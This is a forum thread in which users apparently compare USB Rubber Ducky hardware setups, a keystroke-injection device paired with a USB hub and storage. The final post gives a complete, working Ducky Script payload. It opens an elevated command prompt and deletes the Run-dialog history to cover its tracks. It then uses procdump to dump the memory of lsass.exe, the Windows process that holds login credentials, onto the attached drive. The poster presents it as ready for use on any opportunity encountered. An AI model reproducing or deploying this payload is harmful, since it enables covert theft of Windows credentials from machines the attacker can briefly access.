Jump to content

Show me Yours and I'll show you mine..


Thermostaten
 Share

Recommended Posts

How does your duck setup look :)

I use a bigger USB Storage device now other than the shown ( the top one of the type "SanDisk") because the shown one is only USB2 and the new USB3 one I got also flashes red when it receives data - so now i know when i can remove the hub without losing data.

How does your setup look ?

post-35579-0-18579500-1379626351_thumb.j

post-35579-0-18579500-1379626351_thumb.j

Edited by Thermostaten
Link to comment
Share on other sites

How does your duck setup look :)

I use a bigger USB Storage device now other than the shown ( the top one of the type "SanDisk") because the shown one is only USB2 and the new USB3 one I got also flashes red when it receives data - so now i know when i can remove the hub without losing data.

How does your setup look ?

I was thinking of getting something like this also but didn't know if it would work since I would need the usb drivers to install before the ducky. What delay are you using to ensure that the usb used for storage is registered with the computer before running the ducky payloads?

Thanks sure wish i could find one in the US. Ill keep searching.

Here's one on amazon that looks just like the one above and it also has an LED light.

http://www.amazon.com/HDE-High-Speed-Mini-Port/dp/B006C2BQ6M/ref=sr_1_4?ie=UTF8&qid=1379652145&sr=8-4&keywords=2+port+usb+hub

Link to comment
Share on other sites

Ref. the link to a USB HUB you posted ... it's a USB2 hub.

I use it to get windows lsass memory dumps as Darrne and others showed us how to do..

Here is the code i have running right now on it:

DELAY 15000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb RunAs
ENTER
DELAY 700
ALT y
DELAY 100
BACKSPACE
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
ENTER
DELAY 1000
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "Keyboard"') do set duck=%d
ENTER
DELAY 1000
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp
ENTER
STRING start C:\Windows\System32\Ribbons.scr -s
ENTER
STRING exit
ENTER
I actually also bought a lot of micro SD cards and have all the lovely scripts ready for every job or opportunity i encounter..
Edited by Thermostaten
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...